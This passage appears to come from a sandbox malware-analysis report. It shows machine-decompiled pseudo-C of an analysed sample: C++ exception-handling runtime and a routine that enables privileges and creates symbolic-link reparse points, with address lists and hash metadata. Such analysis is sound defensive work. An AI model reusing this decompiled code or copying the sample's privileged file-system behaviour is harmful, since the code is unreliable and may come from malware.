                                                    									goto L83;
                                                    								}
                                                    								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                    								_t283 = _t220[4];
                                                    								__eflags = _t283;
                                                    								if(_t283 == 0) {
                                                    									L81:
                                                    									__eflags =  *_t220 & 0x00000040;
                                                    									if(( *_t220 & 0x00000040) == 0) {
                                                    										_push(0);
                                                    										_push(1);
                                                    										E00CE2DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                                                    										_t298 = _v12;
                                                    										_t334 = _t334 + 0x30;
                                                    									}
                                                    									goto L83;
                                                    								}
                                                    								__eflags =  *((char*)(_t283 + 8));
                                                    								if( *((char*)(_t283 + 8)) != 0) {
                                                    									goto L83;
                                                    								}
                                                    								goto L81;
                                                    								L83:
                                                    								_t298 = _t298 + 1;
                                                    								_t214 = _v20;
                                                    								_t277 = _v16 + 0x14;
                                                    								_v12 = _t298;
                                                    								_v16 = _t277;
                                                    								__eflags = _t298 - _v32;
                                                    							} while (_t298 < _v32);
                                                    							goto L84;
                                                    						}
                                                    						E00CE8D24(_t271, _t296, 0, _t315);
                                                    						asm("int3");
                                                    						_push(_t329);
                                                    						_t297 = _v184;
                                                    						_push(_t271);
                                                    						_push(_t315);
                                                    						_push(0);
                                                    						_t205 = _t297[4];
                                                    						__eflags = _t205;
                                                    						if(_t205 == 0) {
                                                    							L109:
                                                    							_t207 = 1;
                                                    							__eflags = 1;
                                                    						} else {
                                                    							_t276 = _t205 + 8;
                                                    							__eflags =  *_t276;
                                                    							if( *_t276 == 0) {
                                                    								goto L109;
                                                    							} else {
                                                    								__eflags =  *_t297 & 0x00000080;
                                                    								_t304 = _v0;
                                                    								if(( *_t297 & 0x00000080) == 0) {
                                                    									L91:
                                                    									_t272 = _t304[4];
                                                    									_t317 = 0;
                                                    									__eflags = _t205 - _t272;
                                                    									if(_t205 == _t272) {
                                                    										L101:
                                                    										__eflags =  *_t304 & 0x00000002;
                                                    										if(( *_t304 & 0x00000002) == 0) {
                                                    											L103:
                                                    											_t208 = _a4;
                                                    											__eflags =  *_t208 & 0x00000001;
                                                    											if(( *_t208 & 0x00000001) == 0) {
                                                    												L105:
                                                    												__eflags =  *_t208 & 0x00000002;
                                                    												if(( *_t208 & 0x00000002) == 0) {
                                                    													L107:
                                                    													_t317 = 1;
                                                    													__eflags = 1;
                                                    												} else {
                                                    													__eflags =  *_t297 & 0x00000002;
                                                    													if(( *_t297 & 0x00000002) != 0) {
                                                    														goto L107;
                                                    													}
                                                    												}
                                                    											} else {
                                                    												__eflags =  *_t297 & 0x00000001;
                                                    												if(( *_t297 & 0x00000001) != 0) {
                                                    													goto L105;
                                                    												}
                                                    											}
                                                    										} else {
                                                    											__eflags =  *_t297 & 0x00000008;
                                                    											if(( *_t297 & 0x00000008) != 0) {
                                                    												goto L103;
                                                    											}
                                                    										}
                                                    										_t207 = _t317;
                                                    									} else {
                                                    										_t184 = _t272 + 8; // 0x6e
                                                    										_t209 = _t184;
                                                    										while(1) {
                                                    											_t273 =  *_t276;
                                                    											__eflags = _t273 -  *_t209;
                                                    											if(_t273 !=  *_t209) {
                                                    												break;
                                                    											}
                                                    											__eflags = _t273;
                                                    											if(_t273 == 0) {
                                                    												L97:
                                                    												_t210 = _t317;
                                                    											} else {
                                                    												_t274 =  *((intOrPtr*)(_t276 + 1));
                                                    												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                                                    												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                                                    													break;
                                                    												} else {
                                                    													_t276 = _t276 + 2;
                                                    													_t209 = _t209 + 2;
                                                    													__eflags = _t274;
                                                    													if(_t274 != 0) {
                                                    														continue;
                                                    													} else {
                                                    														goto L97;
                                                    													}
                                                    												}
                                                    											}
                                                    											L99:
                                                    											__eflags = _t210;
                                                    											if(_t210 == 0) {
                                                    												goto L101;
                                                    											} else {
                                                    												_t207 = 0;
                                                    											}
                                                    											goto L110;
                                                    										}
                                                    										asm("sbb eax, eax");
                                                    										_t210 = _t209 | 0x00000001;
                                                    										__eflags = _t210;
                                                    										goto L99;
                                                    									}
                                                    								} else {
                                                    									__eflags =  *_t304 & 0x00000010;
                                                    									if(( *_t304 & 0x00000010) != 0) {
                                                    										goto L109;
                                                    									} else {
                                                    										goto L91;
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						L110:
                                                    						return _t207;
                                                    					}
                                                    				} else {
                                                    					_t270 = _a4;
                                                    					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                                                    						L22:
                                                    						_t296 = _a12;
                                                    						_v8 = _t296;
                                                    						goto L24;
                                                    					} else {
                                                    						_t315 = 0;
                                                    						_t342 = _t270[0x1c];
                                                    						if(_t270[0x1c] != 0) {
                                                    							goto L22;
                                                    						} else {
                                                    							_t224 = E00CE2AEC(_t270, _t275, _t296, _t301, 0, _t342);
                                                    							_t343 =  *((intOrPtr*)(_t224 + 0x10));
                                                    							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                                                    								L61:
                                                    								return _t224;
                                                    							} else {
                                                    								_t270 =  *(E00CE2AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
                                                    								_t259 = E00CE2AEC(_t270, _t275, _t296, _t301, 0, _t343);
                                                    								_v28 = 1;
                                                    								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                                                    								if(_t270 == 0) {
                                                    									goto L67;
                                                    								} else {
                                                    									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                                                    										L16:
                                                    										_t261 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, _t350);
                                                    										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
                                                    										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
                                                    											L23:
                                                    											_t296 = _v8;
                                                    											_t275 = _v12;
                                                    											L24:
                                                    											_v52 = _t301;
                                                    											_v48 = 0;
                                                    											__eflags =  *_t270 - 0xe06d7363;
                                                    											if( *_t270 != 0xe06d7363) {
                                                    												L57:
                                                    												__eflags = _t301[3];
                                                    												if(__eflags <= 0) {
                                                    													goto L60;
                                                    												} else {
                                                    													__eflags = _a24;
                                                    													if(__eflags != 0) {
                                                    														goto L67;
                                                    													} else {
                                                    														_push(_a32);
                                                    														_push(_a28);
                                                    														_push(_t275);
                                                    														_push(_t301);
                                                    														_push(_a16);
                                                    														_push(_t296);
                                                    														_push(_a8);
                                                    														_push(_t270);
                                                    														L68();
                                                    														_t332 = _t332 + 0x20;
                                                    														goto L60;
                                                    													}
                                                    												}
                                                    											} else {
                                                    												__eflags = _t270[0x10] - 3;
                                                    												if(_t270[0x10] != 3) {
                                                    													goto L57;
                                                    												} else {
                                                    													__eflags = _t270[0x14] - 0x19930520;
                                                    													if(_t270[0x14] == 0x19930520) {
                                                    														L29:
                                                    														_t315 = _a32;
                                                    														__eflags = _t301[3];
                                                    														if(_t301[3] > 0) {
                                                    															_push(_a28);
                                                    															E00CE0894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                                                    															_t296 = _v64;
                                                    															_t332 = _t332 + 0x18;
                                                    															_t247 = _v68;
                                                    															_v44 = _t247;
                                                    															_v16 = _t296;
                                                    															__eflags = _t296 - _v56;
                                                    															if(_t296 < _v56) {
                                                    																_t290 = _t296 * 0x14;
                                                    																__eflags = _t290;
                                                    																_v32 = _t290;
                                                    																do {
                                                    																	_t291 = 5;
                                                    																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                                                    																	_t332 = _t332 + 0xc;
                                                    																	__eflags = _v104 - _t250;
                                                    																	if(_v104 <= _t250) {
                                                    																		__eflags = _t250 - _v100;
                                                    																		if(_t250 <= _v100) {
                                                    																			_t294 = 0;
                                                    																			_v20 = 0;
                                                    																			__eflags = _v92;
                                                    																			if(_v92 != 0) {
                                                    																				_t299 = _t270[0x1c];
                                                    																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
                                                    																				_t252 = _t251 + 4;
                                                    																				__eflags = _t252;
                                                    																				_v36 = _t252;
                                                    																				_t253 = _v88;
                                                    																				_v40 =  *_t251;
                                                    																				_v24 = _t253;
                                                    																				do {
                                                    																					asm("movsd");
                                                    																					asm("movsd");
                                                    																					asm("movsd");
                                                    																					asm("movsd");
                                                    																					_t327 = _v40;
                                                    																					_t314 = _v36;
                                                    																					__eflags = _t327;
                                                    																					if(_t327 <= 0) {
                                                    																						goto L40;
                                                    																					} else {
                                                    																						while(1) {
                                                    																							_push(_t299);
                                                    																							_push( *_t314);
                                                    																							_t254 =  &_v84;
                                                    																							_push(_t254);
                                                    																							L87();
                                                    																							_t332 = _t332 + 0xc;
                                                    																							__eflags = _t254;
                                                    																							if(_t254 != 0) {
                                                    																								break;
                                                    																							}
                                                    																							_t299 = _t270[0x1c];
                                                    																							_t327 = _t327 - 1;
                                                    																							_t314 = _t314 + 4;
                                                    																							__eflags = _t327;
                                                    																							if(_t327 > 0) {
                                                    																								continue;
                                                    																							} else {
                                                    																								_t294 = _v20;
                                                    																								_t253 = _v24;
                                                    																								goto L40;
                                                    																							}
                                                    																							goto L43;
                                                    																						}
                                                    																						_push(_a24);
                                                    																						_push(_v28);
                                                    																						E00CE2DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                                                    																						_t332 = _t332 + 0x30;
                                                    																					}
                                                    																					L43:
                                                    																					_t296 = _v16;
                                                    																					goto L44;
                                                    																					L40:
                                                    																					_t294 = _t294 + 1;
                                                    																					_t253 = _t253 + 0x10;
                                                    																					_v20 = _t294;
                                                    																					_v24 = _t253;
                                                    																					__eflags = _t294 - _v92;
                                                    																				} while (_t294 != _v92);
                                                    																				goto L43;
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																	L44:
                                                    																	_t296 = _t296 + 1;
                                                    																	_t247 = _v44;
                                                    																	_t290 = _v32 + 0x14;
                                                    																	_v16 = _t296;
                                                    																	_v32 = _t290;
                                                    																	__eflags = _t296 - _v56;
                                                    																} while (_t296 < _v56);
                                                    																_t301 = _a20;
                                                    																_t315 = _a32;
                                                    															}
                                                    														}
                                                    														__eflags = _a24;
                                                    														if(__eflags != 0) {
                                                    															_push(1);
                                                    															E00CE0150(_t270, _t301, _t315, __eflags);
                                                    															_t275 = _t270;
                                                    														}
                                                    														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                                                    														if(__eflags < 0) {
                                                    															L60:
                                                    															_t224 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                    															__eflags =  *(_t224 + 0x1c);
                                                    															if( *(_t224 + 0x1c) != 0) {
                                                    																goto L67;
                                                    															} else {
                                                    																goto L61;
                                                    															}
                                                    														} else {
                                                    															_t228 = _t301[8] >> 2;
                                                    															__eflags = _t301[7];
                                                    															if(_t301[7] != 0) {
                                                    																__eflags = _t228 & 0x00000001;
                                                    																if(__eflags == 0) {
                                                    																	_push(_t301[7]);
                                                    																	_t229 = E00CE384A(_t270, _t301, _t315, _t270);
                                                    																	_pop(_t275);
                                                    																	__eflags = _t229;
                                                    																	if(__eflags == 0) {
                                                    																		goto L64;
                                                    																	} else {
                                                    																		goto L60;
                                                    																	}
                                                    																} else {
                                                    																	goto L54;
                                                    																}
                                                    															} else {
                                                    																__eflags = _t228 & 0x00000001;
                                                    																if(__eflags == 0) {
                                                    																	goto L60;
                                                    																} else {
                                                    																	__eflags = _a28;
                                                    																	if(__eflags != 0) {
                                                    																		goto L60;
                                                    																	} else {
                                                    																		L54:
                                                    																		 *(E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
                                                    																		_t237 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                    																		_t286 = _v8;
                                                    																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                                                    																		goto L62;
                                                    																	}
                                                    																}
                                                    															}
                                                    														}
                                                    													} else {
                                                    														__eflags = _t270[0x14] - 0x19930521;
                                                    														if(_t270[0x14] == 0x19930521) {
                                                    															goto L29;
                                                    														} else {
                                                    															__eflags = _t270[0x14] - 0x19930522;
                                                    															if(_t270[0x14] != 0x19930522) {
                                                    																goto L57;
                                                    															} else {
                                                    																goto L29;
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    										} else {
                                                    											_v16 =  *((intOrPtr*)(E00CE2AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
                                                    											_t264 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, _t351);
                                                    											_push(_v16);
                                                    											 *(_t264 + 0x1c) = _t315;
                                                    											_t265 = E00CE384A(_t270, _t301, _t315, _t270);
                                                    											_pop(_t286);
                                                    											if(_t265 != 0) {
                                                    												goto L23;
                                                    											} else {
                                                    												_t301 = _v16;
                                                    												_t353 =  *_t301 - _t315;
                                                    												if( *_t301 <= _t315) {
                                                    													L62:
                                                    													E00CE7AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
                                                    												} else {
                                                    													while(1) {
                                                    														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                                                    														if(E00CE34D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xcfefb4) != 0) {
                                                    															goto L63;
                                                    														}
                                                    														_t315 = _t315 + 0x10;
                                                    														_t269 = _v20 + 1;
                                                    														_v20 = _t269;
                                                    														_t353 = _t269 -  *_t301;
                                                    														if(_t269 >=  *_t301) {
                                                    															goto L62;
                                                    														} else {
                                                    															continue;
                                                    														}
                                                    														goto L63;
                                                    													}
                                                    												}
                                                    												L63:
                                                    												_push(1);
                                                    												_push(_t270);
                                                    												E00CE0150(_t270, _t301, _t315, __eflags);
                                                    												_t275 =  &_v64;
                                                    												E00CE34BB( &_v64);
                                                    												E00CE238D( &_v64, 0xcfc284);
                                                    												L64:
                                                    												 *(E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
                                                    												_t231 = E00CE2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                    												_t275 = _v8;
                                                    												 *(_t231 + 0x14) = _v8;
                                                    												__eflags = _t315;
                                                    												if(_t315 == 0) {
                                                    													_t315 = _a8;
                                                    												}
                                                    												E00CE0A87(_t275, _t315, _t270);
                                                    												E00CE374A(_a8, _a16, _t301);
                                                    												_t234 = E00CE3907(_t301);
                                                    												_t332 = _t332 + 0x10;
                                                    												_push(_t234);
                                                    												E00CE36C1(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                    												goto L67;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										_t350 = _t270[0x1c] - _t315;
                                                    										if(_t270[0x1c] == _t315) {
                                                    											goto L67;
                                                    										} else {
                                                    											goto L16;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    0x00ce2e74
                                                    0x00ce2f71
                                                    0x00ce2f71
                                                    0x00ce2f74
                                                    0x00000000
                                                    0x00ce2ea3
                                                    0x00ce2ea3
                                                    0x00ce2ea5
                                                    0x00ce2ea8
                                                    0x00000000
                                                    0x00ce2eae
                                                    0x00ce2eae
                                                    0x00ce2eb3
                                                    0x00ce2eb6
                                                    0x00ce316a
                                                    0x00ce316e
                                                    0x00ce2ebc
                                                    0x00ce2ec1
                                                    0x00ce2ec4
                                                    0x00ce2ec9
                                                    0x00ce2ed0
                                                    0x00ce2ed5
                                                    0x00000000
                                                    0x00ce2edb
                                                    0x00ce2ee1
                                                    0x00ce2f0d
                                                    0x00ce2f0d
                                                    0x00ce2f12
                                                    0x00ce2f15
                                                    0x00ce2f79
                                                    0x00ce2f79
                                                    0x00ce2f7c
                                                    0x00ce2f7f
                                                    0x00ce2f81
                                                    0x00ce2f84
                                                    0x00ce2f87
                                                    0x00ce2f8d
                                                    0x00ce3139
                                                    0x00ce3139
                                                    0x00ce313c
                                                    0x00000000
                                                    0x00ce313e
                                                    0x00ce313e
                                                    0x00ce3141
                                                    0x00000000
                                                    0x00ce3147
                                                    0x00ce3147
                                                    0x00ce314a
                                                    0x00ce314d
                                                    0x00ce314e
                                                    0x00ce314f
                                                    0x00ce3152
                                                    0x00ce3153
                                                    0x00ce3156
                                                    0x00ce3157
                                                    0x00ce315c
                                                    0x00000000
                                                    0x00ce315c
                                                    0x00ce3141
                                                    0x00ce2f93
                                                    0x00ce2f93
                                                    0x00ce2f97
                                                    0x00000000
                                                    0x00ce2f9d
                                                    0x00ce2f9d
                                                    0x00ce2fa4
                                                    0x00ce2fbc
                                                    0x00ce2fbc
                                                    0x00ce2fbf
                                                    0x00ce2fc2
                                                    0x00ce2fc8
                                                    0x00ce2fd8
                                                    0x00ce2fdd
                                                    0x00ce2fe0
                                                    0x00ce2fe3
                                                    0x00ce2fe6
                                                    0x00ce2fe9
                                                    0x00ce2fec
                                                    0x00ce2fef
                                                    0x00ce2ff5
                                                    0x00ce2ff5
                                                    0x00ce2ff8
                                                    0x00ce2ffb
                                                    0x00ce300a
                                                    0x00ce300b
                                                    0x00ce300b
                                                    0x00ce300d
                                                    0x00ce3010
                                                    0x00ce3016
                                                    0x00ce3019
                                                    0x00ce301f
                                                    0x00ce3021
                                                    0x00ce3024
                                                    0x00ce3027
                                                    0x00ce302d
                                                    0x00ce3030
                                                    0x00ce3035
                                                    0x00ce3035
                                                    0x00ce3038
                                                    0x00ce303b
                                                    0x00ce303e
                                                    0x00ce3041
                                                    0x00ce3044
                                                    0x00ce3049
                                                    0x00ce304a
                                                    0x00ce304b
                                                    0x00ce304c
                                                    0x00ce304d
                                                    0x00ce3050
                                                    0x00ce3053
                                                    0x00ce3055
                                                    0x00000000
                                                    0x00ce3057
                                                    0x00ce3057
                                                    0x00ce3057
                                                    0x00ce3058
                                                    0x00ce305a
                                                    0x00ce305d
                                                    0x00ce305e
                                                    0x00ce3063
                                                    0x00ce3066
                                                    0x00ce3068
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce306a
                                                    0x00ce306d
                                                    0x00ce306e
                                                    0x00ce3071
                                                    0x00ce3073
                                                    0x00000000
                                                    0x00ce3075
                                                    0x00ce3075
                                                    0x00ce3078
                                                    0x00000000
                                                    0x00ce3078
                                                    0x00000000
                                                    0x00ce3073
                                                    0x00ce308c
                                                    0x00ce3092
                                                    0x00ce30af
                                                    0x00ce30b4
                                                    0x00ce30b4
                                                    0x00ce30b7
                                                    0x00ce30b7
                                                    0x00000000
                                                    0x00ce307b
                                                    0x00ce307b
                                                    0x00ce307c
                                                    0x00ce307f
                                                    0x00ce3082
                                                    0x00ce3085
                                                    0x00ce3085
                                                    0x00000000
                                                    0x00ce308a
                                                    0x00ce3027
                                                    0x00ce3019
                                                    0x00ce30ba
                                                    0x00ce30bd
                                                    0x00ce30be
                                                    0x00ce30c1
                                                    0x00ce30c4
                                                    0x00ce30c7
                                                    0x00ce30ca
                                                    0x00ce30ca
                                                    0x00ce30d3
                                                    0x00ce30d6
                                                    0x00ce30d6
                                                    0x00ce2fef
                                                    0x00ce30d9
                                                    0x00ce30dd
                                                    0x00ce30df
                                                    0x00ce30e2
                                                    0x00ce30e8
                                                    0x00ce30e8
                                                    0x00ce30f0
                                                    0x00ce30f5
                                                    0x00ce315f
                                                    0x00ce315f
                                                    0x00ce3164
                                                    0x00ce3168
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce30f7
                                                    0x00ce30fa
                                                    0x00ce30fd
                                                    0x00ce3101
                                                    0x00ce310f
                                                    0x00ce3111
                                                    0x00ce3128
                                                    0x00ce312c
                                                    0x00ce3132
                                                    0x00ce3133
                                                    0x00ce3135
                                                    0x00000000
                                                    0x00ce3137
                                                    0x00000000
                                                    0x00ce3137
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3103
                                                    0x00ce3103
                                                    0x00ce3105
                                                    0x00000000
                                                    0x00ce3107
                                                    0x00ce3107
                                                    0x00ce310b
                                                    0x00000000
                                                    0x00ce310d
                                                    0x00ce3113
                                                    0x00ce3118
                                                    0x00ce311b
                                                    0x00ce3120
                                                    0x00ce3123
                                                    0x00000000
                                                    0x00ce3123
                                                    0x00ce310b
                                                    0x00ce3105
                                                    0x00ce3101
                                                    0x00ce2fa6
                                                    0x00ce2fa6
                                                    0x00ce2fad
                                                    0x00000000
                                                    0x00ce2faf
                                                    0x00ce2faf
                                                    0x00ce2fb6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2fb6
                                                    0x00ce2fad
                                                    0x00ce2fa4
                                                    0x00ce2f97
                                                    0x00ce2f17
                                                    0x00ce2f1f
                                                    0x00ce2f22
                                                    0x00ce2f27
                                                    0x00ce2f2b
                                                    0x00ce2f2e
                                                    0x00ce2f34
                                                    0x00ce2f37
                                                    0x00000000
                                                    0x00ce2f39
                                                    0x00ce2f39
                                                    0x00ce2f3c
                                                    0x00ce2f3e
                                                    0x00ce316f
                                                    0x00ce316f
                                                    0x00000000
                                                    0x00ce2f44
                                                    0x00ce2f4c
                                                    0x00ce2f57
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2f60
                                                    0x00ce2f63
                                                    0x00ce2f64
                                                    0x00ce2f67
                                                    0x00ce2f69
                                                    0x00000000
                                                    0x00ce2f6f
                                                    0x00000000
                                                    0x00ce2f6f
                                                    0x00000000
                                                    0x00ce2f69
                                                    0x00ce2f44
                                                    0x00ce3174
                                                    0x00ce3174
                                                    0x00ce3176
                                                    0x00ce3177
                                                    0x00ce317e
                                                    0x00ce3181
                                                    0x00ce318f
                                                    0x00ce3194
                                                    0x00ce3199
                                                    0x00ce319c
                                                    0x00ce31a1
                                                    0x00ce31a4
                                                    0x00ce31a7
                                                    0x00ce31a9
                                                    0x00ce31ab
                                                    0x00ce31ab
                                                    0x00ce31b0
                                                    0x00ce31bc
                                                    0x00ce31c2
                                                    0x00ce31c7
                                                    0x00ce31ca
                                                    0x00ce31cb
                                                    0x00000000
                                                    0x00ce31cb
                                                    0x00ce2f37
                                                    0x00ce2f04
                                                    0x00ce2f04
                                                    0x00ce2f07
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2f07
                                                    0x00ce2ee1
                                                    0x00ce2ed5
                                                    0x00ce2eb6
                                                    0x00ce2ea8
                                                    0x00ce2e74

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 322700389-393685449
                                                    • Opcode ID: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                    • Instruction ID: 8b221ff6eccb783a14d4ccef9b9fb231c4923c2f7c63c414753f11cb3a37fafc
                                                    • Opcode Fuzzy Hash: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                    • Instruction Fuzzy Hash: 80B18D719002D9EFCF25DFA6C8859AEB7B9FF04310F14416AE8116B212D731EB51DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CC6FA5(void* __edx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t109;
                                                    				signed int _t112;
                                                    				intOrPtr _t117;
                                                    				signed int _t134;
                                                    				long _t154;
                                                    				void* _t182;
                                                    				void* _t186;
                                                    				void* _t190;
                                                    				void* _t194;
                                                    				short _t195;
                                                    				void* _t199;
                                                    				WCHAR* _t200;
                                                    				long _t201;
                                                    				signed int _t203;
                                                    				signed int _t204;
                                                    				signed int _t205;
                                                    				signed int _t229;
                                                    				intOrPtr* _t233;
                                                    				intOrPtr* _t234;
                                                    				void* _t236;
                                                    				intOrPtr _t237;
                                                    				signed int _t238;
                                                    				void* _t239;
                                                    				intOrPtr _t240;
                                                    				signed int _t242;
                                                    				intOrPtr _t244;
                                                    				short _t245;
                                                    				void* _t246;
                                                    				intOrPtr _t250;
                                                    				short _t252;
                                                    				void* _t253;
                                                    				void* _t255;
                                                    				void* _t256;
                                                    
                                                    				E00CDEB78(0xcf279e, _t253);
                                                    				E00CDEC50(0x30a8);
                                                    				if( *0xd01023 == 0) {
                                                    					E00CC7A9C(L"SeRestorePrivilege");
                                                    					E00CC7A9C(L"SeCreateSymbolicLinkPrivilege");
                                                    					 *0xd01023 = 1;
                                                    				}
                                                    				_t203 = _t253 - 0x2c;
                                                    				E00CC13BA(_t203, 0x1418);
                                                    				_t244 =  *((intOrPtr*)(_t253 + 0x10));
                                                    				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
                                                    				E00CD0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
                                                    				 *(_t253 - 0x14) = E00CE3E13(_t253 - 0x107c);
                                                    				_t236 = _t253 - 0x107c;
                                                    				_t199 = _t253 - 0x207c;
                                                    				_t109 = E00CE6088(_t236, L"\\??\\", 4);
                                                    				_t256 = _t255 + 0x10;
                                                    				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
                                                    				 *(_t253 - 0xd) = _t204;
                                                    				if(_t109 == 0) {
                                                    					_t236 = _t253 - 0x1074;
                                                    				}
                                                    				if(_t204 != 0) {
                                                    					_t194 = E00CE6088(_t236, L"UNC\\", 4);
                                                    					_t256 = _t256 + 0xc;
                                                    					if(_t194 == 0) {
                                                    						_t195 = 0x5c;
                                                    						 *((short*)(_t253 - 0x207c)) = _t195;
                                                    						_t199 = _t253 - 0x207a;
                                                    						_t236 = _t236 + 6;
                                                    					}
                                                    				}
                                                    				E00CE6066(_t199, _t236);
                                                    				_t112 = E00CE3E13(_t253 - 0x207c);
                                                    				_t237 =  *((intOrPtr*)(_t253 + 8));
                                                    				_t200 =  *(_t253 + 0xc);
                                                    				 *(_t253 - 0x18) = _t112;
                                                    				if( *((char*)(_t237 + 0x7197)) != 0) {
                                                    					L12:
                                                    					E00CCA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
                                                    					if(E00CCA231(_t200) != 0) {
                                                    						_t186 = E00CCA28F(E00CCA243(_t200));
                                                    						_push(_t200);
                                                    						if(_t186 == 0) {
                                                    							E00CCA1E0();
                                                    						} else {
                                                    							E00CCA18F();
                                                    						}
                                                    					}
                                                    					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
                                                    						__eflags = CreateDirectoryW(_t200, 0);
                                                    						if(__eflags != 0) {
                                                    							goto L21;
                                                    						}
                                                    						_t201 = 0;
                                                    						E00CC2021(__eflags, 0x14, 0, _t200);
                                                    						E00CC6D83(0xd01098, 9);
                                                    						goto L42;
                                                    					} else {
                                                    						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
                                                    						if(_t182 != 0xffffffff) {
                                                    							CloseHandle(_t182);
                                                    							L21:
                                                    							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
                                                    							__eflags = _t117 - 3;
                                                    							if(_t117 != 3) {
                                                    								__eflags = _t117 - 2;
                                                    								if(_t117 == 2) {
                                                    									L27:
                                                    									_t233 =  *(_t253 - 0x2c);
                                                    									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
                                                    									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
                                                    									 *_t233 = 0xa000000c;
                                                    									_t245 = _t205 + _t205;
                                                    									 *((short*)(_t233 + 0xa)) = _t245;
                                                    									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
                                                    									 *((intOrPtr*)(_t233 + 6)) = 0;
                                                    									E00CE6066(_t233 + 0x14, _t253 - 0x107c);
                                                    									_t246 =  *(_t253 - 0x2c);
                                                    									 *((short*)(_t246 + 0xc)) = _t245 + 2;
                                                    									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
                                                    									E00CE6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
                                                    									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
                                                    									__eflags = _t134;
                                                    									 *(_t246 + 0x10) = _t134;
                                                    									L28:
                                                    									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
                                                    									__eflags = _t239 - 0xffffffff;
                                                    									if(_t239 != 0xffffffff) {
                                                    										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
                                                    										if(__eflags != 0) {
                                                    											E00CC9556(_t253 - 0x30b4);
